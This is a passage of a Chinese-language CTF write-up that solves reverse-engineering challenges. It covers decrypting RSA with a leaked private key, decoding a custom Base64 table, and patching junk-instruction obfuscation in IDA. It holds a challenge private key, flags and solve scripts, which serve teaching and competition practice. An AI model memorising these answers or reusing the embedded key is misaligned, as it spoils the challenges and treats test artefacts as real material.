b2QRYm1qquBd8E16AwjhZyO3XCAWaO3gKAw1wmcZf8gA9hSk0d1KoQJAa75FKWmL
JhUlWs+kG+KdhEQNkVu0lfxv7Bqwf1/AzddwBcbO1XrD3VeUFj7GmRLTLKn8qqte
ly52zDvm5DlwWA==
-----END RSA PRIVATE KEY-----"""

ciphertext_b64 = "PKn6B7xz9AM3wwwNYZnQIx2RnCDQL52Xq1M9znBMxBxwRQJJLdaDNQ7XyVEaKs/r5r3D2WJS6HJUapuO20vEsMWFyNuzeQHVxrQRLw8vHXT/pgC5kOjvreRDKLgmWejn0klLQbkARox9f7Q+1x370YIFouLrNQUjJOTyKuGmukk="

def decrypt_rsa():
# 1. 加载私钥
try:
private_key = RSA.import_key(private_key_pem)
print(f"✅ 私钥加载成功")
print(f" 密钥大小: {private_key.size_in_bits()} bits")
except Exception as e:
print(f"❌ 私钥加载失败: {e}")
return

# 2. 解码密文
try:
ciphertext = b64decode(ciphertext_b64)
print(f"✅ 密文解码成功")
print(f" 密文长度: {len(ciphertext)} bytes ({len(ciphertext)*8} bits)")

# 检查密文长度是否符合1024位RSA
if len(ciphertext) == 128: # 1024位 = 128字节
print(f" ✅ 密文长度符合1024位RSA")
else:
print(f" ⚠️ 密文长度异常: 期望128字节,实际{len(ciphertext)}字节")
except Exception as e:
print(f"❌ 密文解码失败: {e}")
return

print("\n" + "="*50)
print("尝试不同的解密方式...")
print("="*50)

# 3. 尝试PKCS1_v1_5解密(最常用)
print("\n1. 尝试PKCS1_v1_5解密:")
try:
cipher = PKCS1_v1_5.new(private_key)
decrypted = cipher.decrypt(ciphertext, None)
if decrypted:
print(f" ✅ 解密成功!")
print(f" 解密结果: {decrypted}")
print(f" 十六进制: {binascii.hexlify(decrypted).decode()}")
try:
print(f" 文本(UTF-8): {decrypted.decode('utf-8')}")
except:
try:
print(f" 文本(GBK): {decrypted.decode('gbk')}")
except:
print(f" 无法解码为常见文本格式")
else:
print(f" ❌ 解密失败: 无效填充")
except Exception as e:
print(f" ❌ 解密出错: {e}")

if __name__ == "__main__":
decrypt_rsa()

CBCTF{nev3r_1e@k_y00r_PR1V@t3_k8Y}

  • BF5

不能玩战地6的T0FV404深陷绝望之中,只能用战地5捞薯条解决乏闷,结果管理员直接把他踢了,需要flag来重新登录,你能帮帮他吗?(建议做完本题后在去做BF6)

点到主函数看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
__int64 sub_411D00()
{
int v0; // edx
__int64 v2; // [esp-8h] [ebp-124h]
char *Block; // [esp+D0h] [ebp-4Ch]
_DWORD v4[3]; // [esp+DCh] [ebp-40h] BYREF
size_t v5; // [esp+E8h] [ebp-34h]
char Str[4]; // [esp+F4h] [ebp-28h] BYREF
int v7; // [esp+F8h] [ebp-24h]
int v8; // [esp+FCh] [ebp-20h]
int v9; // [esp+100h] [ebp-1Ch]
int v10; // [esp+104h] [ebp-18h]
int v11; // [esp+108h] [ebp-14h]
int v12; // [esp+10Ch] [ebp-10h]
int v13; // [esp+110h] [ebp-Ch]
int savedregs; // [esp+11Ch] [ebp+0h] BYREF

sub_411325(&unk_41C0A3);
*(_DWORD *)Str = 0;
v7 = 0;
v8 = 0;
v9 = 0;
v10 = 0;
v11 = 0;
v12 = 0;
v13 = 0;
puts("T0FV404 is playing BF5 and farming noobs.");
sub_411352();
puts(
"Oh,nooooo!The administrator kicked T0FV404 out of the server,and a flag is required for him to rejoin.Can you help him?");
sub_411352();
sub_41119A("%31s", (char)Str);
v5 = j_strlen(Str);
v4[0] = 0;
Block = (char *)sub_411023(Str, v5, v4);
sub_411320(Block);
free(Block);
sub_411352();
sub_41127B(&savedregs, &dword_411E0C, 0, v0);
return v2;
}

1023函数跳转到17A0:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
int __cdecl sub_4117A0(char *Str, size_t a2, _DWORD *a3)
{
size_t Size; // ecx
int v5; // [esp+10h] [ebp-160h]
int v6; // [esp+10h] [ebp-160h]
char n61; // [esp+13h] [ebp-15Dh]
char n61_1; // [esp+13h] [ebp-15Dh]
unsigned int v9; // [esp+E4h] [ebp-8Ch]
int v10; // [esp+FCh] [ebp-74h]
int v11; // [esp+108h] [ebp-68h]
int v12; // [esp+138h] [ebp-38h]
int v13; // [esp+144h] [ebp-2Ch]
int v14; // [esp+144h] [ebp-2Ch]
int v15; // [esp+144h] [ebp-2Ch]
int v16; // [esp+144h] [ebp-2Ch]
size_t v17; // [esp+150h] [ebp-20h]
size_t v18; // [esp+150h] [ebp-20h]
size_t v19; // [esp+150h] [ebp-20h]

sub_411325(&unk_41C0A3);
*a3 = 4 * ((a2 + 2) / 3);
Size = *a3 + 1;
if ( *a3 == -1 )
Size = -1;
malloc(Size);
v12 = sub_411352();
if ( !v12 )
return 0;
v17 = 0;
v13 = 0;
while ( v17 < a2 )
{
v11 = Str[v17];
v18 = v17 + 1;
if ( v18 >= a2 )
v5 = 0;
else
v5 = Str[v18];
v10 = v5;
v19 = v18 + 1;
if ( v19 >= a2 )
v6 = 0;
else
v6 = Str[v19];
v17 = v19 + 1;
v9 = v6 | (v10 << 8) | (v11 << 16);
*(_BYTE *)(v13 + v12) = aAbcdefghijklmn[(v9 >> 18) & 0x3F];// "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
v14 = v13 + 1;
*(_BYTE *)(v14 + v12) = aAbcdefghijklmn[(v9 >> 12) & 0x3F];// "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
v15 = v14 + 1;
if ( v17 <= a2 + 1 )
n61 = aAbcdefghijklmn[(v9 >> 6) & 0x3F]; // "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
else
n61 = 61;
*(_BYTE *)(v15 + v12) = n61;
v16 = v15 + 1;
if ( v17 <= a2 )
n61_1 = aAbcdefghijklmn[v9 & 0x3F]; // "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
else
n61_1 = 61;
*(_BYTE *)(v16 + v12) = n61_1;
v13 = v16 + 1;
}
*(_BYTE *)(v12 + *a3) = 0;
return v12;
}

1320跳转1B30,函数找到密文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int __cdecl sub_411B30(char *Str)
{
size_t i; // [esp+D0h] [ebp-8h]

sub_411325(&unk_41C0A3);
if ( !Str )
exit(0);
for ( i = 0; i < j_strlen(Str); ++i )
{
if ( Str[i] != byte_417B30[i] )
exit(0);
}
puts("Now you can enter the server.");
return sub_411352();
}
1
2
.rdata:00417B30 51                                byte_417B30 db 51h                      ; DATA XREF: sub_411B30+6D↑r
.rdata:00417B31 30 4C 44 57 45 5A 36 51 61 58… a0ldwez6qax7ymf db '0LDWEZ6QaX7YmFmY1GmXVbltW9fNI9aGY0=',0

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
import base64

custom_table = "CBADEFIHGLKJNMOPQRSTUWVYXZqwertyuiopasdfghjklzxcvbnm0721345689+/"
standard_table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

enc = "Q0LDWEZ6QaX7YmFmY1GmXVbltW9fNI9aGY0="
# 将自定义表编码的字符串转成标准表编码的字符串
trans = str.maketrans(custom_table, standard_table)
std_enc = enc.translate(trans)

# 标准 Base64 解码
flag_bytes = base64.b64decode(std_enc)
print(flag_bytes.decode('ascii'))

CBCTF{BF5_1s_r3ally_g0od!}

  • Strange

这代码怎么看着这么奇怪呢

有点震惊,签到题加花???

strings搜索一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
└─# strings attachment.exe
!This program cannot be run in DOS mode.
Rich`g
.text
`.rdata
@.data
.fptable
.reloc
u"h
h`qA
hDqA
h@qA
h8qA
Y_^[
Y_^[
>csm
SVW3
ineI
5ntel
5Genu
t#=`
j$X9E
_^[3
j X+
_^[]
8_^]
8csm
8csm
Y_^[
t2VW
>csm
?RCC
?MOC
?csm
URPQQh
L$,3
UVWS
[_^]
SVWj
Rh%<@
_^[]
=0qA
BVj(j
hw<@
UQPXY]Y[
Wu%j
h |A
Vh8|A
h0|A
h8|A
%TpA
VhL|A
hD|A
hL|A
Vh\|A
hT|A
h\|A
Vhp|A
hh|A
hp|A
h||A
QQSVWd
;p$u
p$^]
oF f
oF f
oF f
oV f
o^0f
of@f
onPf
ov`f
o~pf
FGIu
FGIu
YYPV
Y_^[
Y_^[
u SW
EE,P
_^[]
dSVW
;csm
;csm
u 9s
;csm
v!8E
u QW
uj_^[
EE$P
;MOC
;RCC
@u)j
u Qj
@_^[]
9p u"
:csm
ft&9q
:csm
r49z
@_^[]
RVWS
Y_^[
>csm
8csm
t0QW
Y_^[
hcsm
u+;}
Y_^[
unWQ
Y_^[
PPPPP
,0< w
,0< w
SSSSS
9^4t
SSSSS
9^4t
SSSSS
9^4t
G0_^[]
QSVW
G0_^[
QSVW
G0_^[
QQSVW
G0_^[
t<Sj
G0_^[
QQSVW
G0_^[
SSSSS
^88_
SSSSS
SSSSS
A-<Fu
<Nu4
RRRRR
9Q(u
<ItC<Lt3<Tt#<h
8<6u
A<lt'<tt
<zu1
SVWP
Xt$+
F +F4+
~2Pj0
;F4u
;F4u
Y_^[
QQSW
^j4Yt
C-<at
SWVQP
<Gu-
<-u
G4QP
O0_[
PPPPP
w0SV
w0SV
QSVW
PPPPP
PPPPP
PPPPPPPP
wGt>
PVVS
Y[^_
< t1< t-
=t7j
Y_^[
PPPPP
Y_^]
SSSSj
Y_^[
j Y+
htqA
hdqA
YYh|qA
hxqA
Y_^[
=csm
h#lA
h@lA
Y_^[
Y_^[
Y_^[
>_^]
f;1u
%0qA
PPPPP
;1t+;u
j-h@
QSVW
Wu;j
h |A
Y_^[
Y_^[
j,hx
Y_^[
_^[]
SVW3
Y_^[
_^[]
M,j"^QRRRRR
u$RV
j0Xu3
j0Yf
Vj0XPW
r"Sj
dr'j
jdVS
j0Yj
j0Yj
M$j"^Q
QQQQQ
80t/
-jd_;
QQQQQ
PSWV
Wj0V
}'9E
_^[
PPPPP
t,9F
_^[]
QQSVW
SSSSS
u0SP
u0St:
(_^[
j"_3
VPPPPP
QSVW
u Vh
f94H
~';Z
Wj P
Wj P
_^[]
Y_^[
Y_^[
Y_^[
Y_^[
SVhd
FLY;
t iu
SSSSj
_^[]
*?QP
PPPPP
WWWWW
<:u
SSSPSQ
/<.u
uSSSSj
_[^]
Y_^[
_^[]
IH;A
9wLt
;3t'
Y_^[
X_^]
wFt&
w=ty
*ti-
tL-c
f9:t!V
f9:u
SSSS
PVSS
Wj=V
u|9]
Y_^[
SSSSS
PPPPP
QQSVj8j@
Y_[^]
Y_^[
xg;5
_^[]
@9}
YY^]
Y_^[
_^[]
Y_^[
Y_^[
Y_^[
Y_^[
SVW3
_^[]
WWWWW
Y_^[
PPPPP
Y_^[
xE;5
SVWP
SS@j
L2.;
Y_^[
PVVVVV
Y_^[
SPPP
[_^]
^PQQQQQ
E ^PQQQQ
>;9u
wIPS3
sv+3
sv+3
sv*Q
sv*Q
j&Z;
j&Z;
E H;
j _;
PPPPP
YY^[]
@( t
w WS
u$_[
PPPPPPPP
PPPPPWV
QQQP
PPPSW
PP9E u
PPSWP
VPRQ
PRPQh
^[_]
Y_^[
Y_^[
Y_^[
Y_^[
xK;5
PQQQ
PVVVVV
Y_^[
?VWk
D8(Ht
^f93u
D8(HXtIf
Nf9E
Xf9E
D8(Ht5F
-^_[
_f9;u
Y_^[
|*=2
$SVW
u ^[3
Wj V
<$tL
u S
{ WPV
C VP
w3t"
AP_^
AP_^
_^[]
Y_^[
Y_^[
Y__^[
v N+D$
WVS3
WVU3
v N+D$
^_[3
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
__based(
__cdecl
__stdcall
__thiscall
__fastcall
__vectorcall
__preserve_none
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
new
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`RTTI
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
Unknown exception
bad exception
(null)
CorExitProcess
AreFileApisANSI
CompareStringEx
FlsGetValue2
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
e+000
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
June
July
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
d8L2
[aOni*{
@2&@
"RP(
eLK(w
FEMh
h0'D
owM&
~ $s%r
@b;zO]
$qE}
;*xh
["93
iu+-,
\lo}
obwQ4
&Sgw
R E]
?nz(
=87M
v2!L.2
cQr
X/4B
k=yI
^<V7w
W&|.
1#INF
1#QNAN
1#SNAN
1#IND
lzZ?
log10
asin
acos
sqrt
?log10
k8=
?5Wg4p
Nv$^
w(@
BC .=
(lX
#{ =
`~R=
}s"=
%S#[k
"B <1=
\-!y
#.X'=
i9+=
lzZ?
sinh
cosh
tanh
atan
atan2
ceil
floor
fabs
modf
ldexp
_cabs
_hypot
fmod
frexp
_logb
_nextafter
.text$mn
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.data$rs
.bss
.fptable
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
KERNEL32.dll
RtlUnwind
GetLastError
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
EncodePointer
RaiseException
GetStdHandle
WriteFile
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
GetCommandLineA
GetCommandLineW
HeapAlloc
HeapFree
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
InitializeCriticalSectionEx
VirtualProtect
CompareStringW
LCMapStringW
GetFileType
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetStringTypeW
GetProcessHeap
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
GetFileSizeEx
SetFilePointerEx
HeapSize
HeapReAlloc
CloseHandle
ReadFile
ReadConsoleW
CreateFileW
WriteConsoleW
DecodePointer
Enter input:
Read error
Memory error
FuxNFb|$QXR#Xe#}F#lqZ[`T@Q&&
success
fail
%99s

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
1!1P1
2-3j3y3
5$50595>5D5N5X5h5x5
6$6,676<6B6L6V6i6n6|6
6P7~7
8/9[9
:+:2:8:J:T:
;C;R;[;h;~;
<.<7<=<P<
=5=?=`=
>&>:>?>R>q>
0(01070=0R0[0i0q0
1 1&1/151=1B1V1[1
5#5'5+5/53575;5?5C5G5K5O5S5W5[5_5c5g5k5o5s5w5{5
<!<L<P<
=*=4=>=L=g=y=
>/>W>k>}>
?8?E?N?S?X?s?}?
0-0=0
0$1?1D1W2h2D4W4u4
416h6o6t6x6|6
7 7$7(7,7
9$909>9N9c9z9
:&:/:
;9;b;
K7S7Y7
9&:g;<=@=D=H=L=P=T=X=
<'<.<7<M<f<{<
<P=U=
2$2<2J2m2
3.373D3S3g3p3
3$434
575?5H5Q5b5s5
5<6H6M6S6X6`6f6n6
6e7q7
98:a:q:
;";<;u;
< <"<3<8<
1P2e2
3!3'383=3B3Q3b3g3l3|3
354<4O4d4
5!5>5b5
6E6i6
7"707Q7X7o7
;?;Y;
<a=g=
101:1a1k1
7%:E:
=k>9?
N1m3x3
4'4-4
4)5Z5
5X6n6 7
8'898L8e8
9%9O9V9
070j0
5/5z5
5=6P6u6
9L9f9x9
:":&:0:C:Q:g:
20?0y0
5L5[5i5
6I6P6
7 727D7V7h7z7
8+8=8O8q91:
=R=i=
?B?z?
0S0n0
0\1c1j1q1~1
3%3S3
4w7p:
:*<]<r<|<
=N=]=
4$5t5
7!9*9
1=1D1K1n1!9)9Z9a9
J1y7
7'868
:1 3
3Y4_4x4}4
7$8[8
:\;p;
<+=9=D=
='>6>t>
2U2l2
3$3.3j3
6i6u6
7'7I7Y7e7t7"8b8
8'9<9E9N9k:
;6>W?
5:5D5J5S5v5~5
546V6
7L7P7T7X7\7`7d7h7l7p7t7x7|7
7=8W8d8
:A;M;a;m;y;
</<?<K<Z<m=
>4>H>S>
>)?l?
161F1
3;5E5Y5c5{5
5-6&7Z:
:$;(;,;0;
;#>=>N>
/0X0(1,1014181<1@1D1
1v2{2
8":Q;
<7<T<q<
01<1H1L1P1T1X1\1h1l1p1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5
?$?,?0?4?8?<?
6(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
42<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9
P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
9 9(90989@9H9P9X9`9h9p9x9
: :(:0:8:@:H:P:X:`:h:
7L8T8\8d8l8t8|8
9$9,9 :$:d:h:p:
:L;P;`;d;l;
0,000L0P0p0x0|0
14181@1H1P1T1\1p1x1
2d2h2
3,303P3p3
404P4p4
505P5p5
6,606
282H2X2h2x2
8 8$8(8,8084888<8

不难发现密文FuxNFb|$QXR#Xe#}F#lqZ[`T@Q&&

alt+T再交叉引用定位到

1
.text:00401327 C7 85 E8 FE FF FF 30 E0 41 00     mov     dword ptr [ebp-118h], offset aFuxnfbQxrXeFLq ; "FuxNFb|$QXR#Xe#}F#lqZ[`T@Q&&"

F5无效,发现还没有函数,而且存在花指令:

1
2
3
4
5
6
7
8
9
10
.text:004011E7 74 02                             jz      short loc_4011EB
.text:004011E7
.text:004011E9 EB 02 jmp short near ptr loc_4011EB+2
.text:004011E9
.text:004011EB ; ---------------------------------------------------------------------------
.text:004011EB
.text:004011EB loc_4011EB: ; CODE XREF: .text:004011E7↑j
.text:004011EB ; .text:004011E9↑j
.text:004011EB E8 FF 68 00 E0 call near ptr 0E0407AEFh
.text:004011EB

+2,把11EB的前两个字节nop掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
.text:004011E7 74 02                             jz      short loc_4011EB
.text:004011E7
.text:004011E9 EB 02 jmp short near ptr unk_4011ED
.text:004011E9
.text:004011EB ; ---------------------------------------------------------------------------
.text:004011EB
.text:004011EB loc_4011EB: ; CODE XREF: .text:004011E7↑j
.text:004011EB 90 nop
.text:004011EC 90 nop
.text:004011EC
.text:004011EC ; ---------------------------------------------------------------------------
.text:004011ED 68 unk_4011ED db 68h ; h ; CODE XREF: .text:004011E9↑j
.text:004011EE 00 db 0 ; OFF32 SEGDEF [_data,41E000]
.text:004011EF E0 db 0E0h

根据跳转提示,在11ED处C,转成代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
.text:004011E7 74 02                             jz      short loc_4011EB
.text:004011E7
.text:004011E9 EB 02 jmp short loc_4011ED
.text:004011E9
.text:004011EB ; ---------------------------------------------------------------------------
.text:004011EB
.text:004011EB loc_4011EB: ; CODE XREF: .text:004011E7↑j
.text:004011EB 90 nop
.text:004011EC 90 nop
.text:004011EC
.text:004011ED
.text:004011ED loc_4011ED: ; CODE XREF: .text:004011E9↑j
.text:004011ED 68 00 E0 41 00 push offset aEnterInput ; "Enter input: "
.text:004011ED
.text:004011ED ; ---------------------------------------------------------------------------
.text:004011F2 E8 db 0E8h

此时还无法创建函数,11F2处有未识别指令,直接C,此时可以创建函数了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
int sub_4011C0()
{
int v0; // eax
int v1; // eax
int v3; // eax
int v4; // eax
int _FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&_; // eax
unsigned int __r_n_; // [esp+14h] [ebp-114h]
unsigned int p_i; // [esp+18h] [ebp-110h] BYREF
unsigned int i; // [esp+1Ch] [ebp-10Ch]
LPVOID lpMem; // [esp+20h] [ebp-108h]
char FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&[256]; // [esp+24h] [ebp-104h] BYREF

sub_401440(Enter_input__); // "Enter input: "
v0 = sub_4059A8(0);
if ( sub_405B85(FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&, 256, v0) )
{
__r_n_ = sub_4079B0(FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&, r_n);// "\r\n"
if ( __r_n_ >= 0x100 )
sub_40159D();
FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&[__r_n_] = 0;
p_i = 0;
v3 = sub_407A00(FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&);
lpMem = (LPVOID)sub_401000(FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&, v3, &p_i);
if ( lpMem )
{
for ( i = 0; i < p_i; ++i )
*((_BYTE *)lpMem + i) ^= 0x16u;
_FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&_ = sub_407A00(aFuxnfbQxrXeFLq);// "FuxNFb|$QXR#Xe#}F#lqZ[`T@Q&&"
if ( p_i != _FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&_ || sub_4021DB(
lpMem,
aFuxnfbQxrXeFLq,// "FuxNFb|$QXR#Xe#}F#lqZ[`T@Q&&"
p_i) )
{
sub_401440(aFail); // "fail\n"
sub_401440(a99s); // "%99s"
}
else
{
sub_401440(aSuccess); // "success\n"
}
sub_407990(lpMem);
return 0;
}
else
{
v4 = sub_4059A8(2);
sub_401400(v4, aMemoryError); // "Memory error\n"
return 1;
}
}
else
{
v1 = sub_4059A8(2);
sub_401400(v1, Memory_error_n); // "Read error\n"
return 1;
}
}

401000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
int __cdecl sub_401000(_BYTE *FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&, unsigned int a2, unsigned int *p_i)
{
char n61_1; // [esp+Ch] [ebp-24h]
char n61; // [esp+10h] [ebp-20h]
int v6; // [esp+14h] [ebp-1Ch]
int v7; // [esp+18h] [ebp-18h]
int v8; // [esp+1Ch] [ebp-14h]
unsigned int v9; // [esp+20h] [ebp-10h]
int v10; // [esp+24h] [ebp-Ch]
int v11; // [esp+28h] [ebp-8h]
int v12; // [esp+28h] [ebp-8h]
int v13; // [esp+28h] [ebp-8h]
int v14; // [esp+28h] [ebp-8h]
unsigned int v15; // [esp+2Ch] [ebp-4h]

*p_i = 4 * ((a2 + 2) / 3);
v10 = sub_4079A0(*p_i + 1);
if ( !v10 )
return 0;
v15 = 0;
v11 = 0;
while ( v15 < a2 )
{
v8 = (unsigned __int8)FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&[v15];
if ( ++v15 >= a2 )
v7 = 0;
else
v7 = (unsigned __int8)FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&[v15++];
if ( v15 >= a2 )
v6 = 0;
else
v6 = (unsigned __int8)FuxNFb_$QXR_Xe__F_lqZ[_T@Q&&[v15++];
v9 = v6 | (v7 << 8) | (v8 << 16);
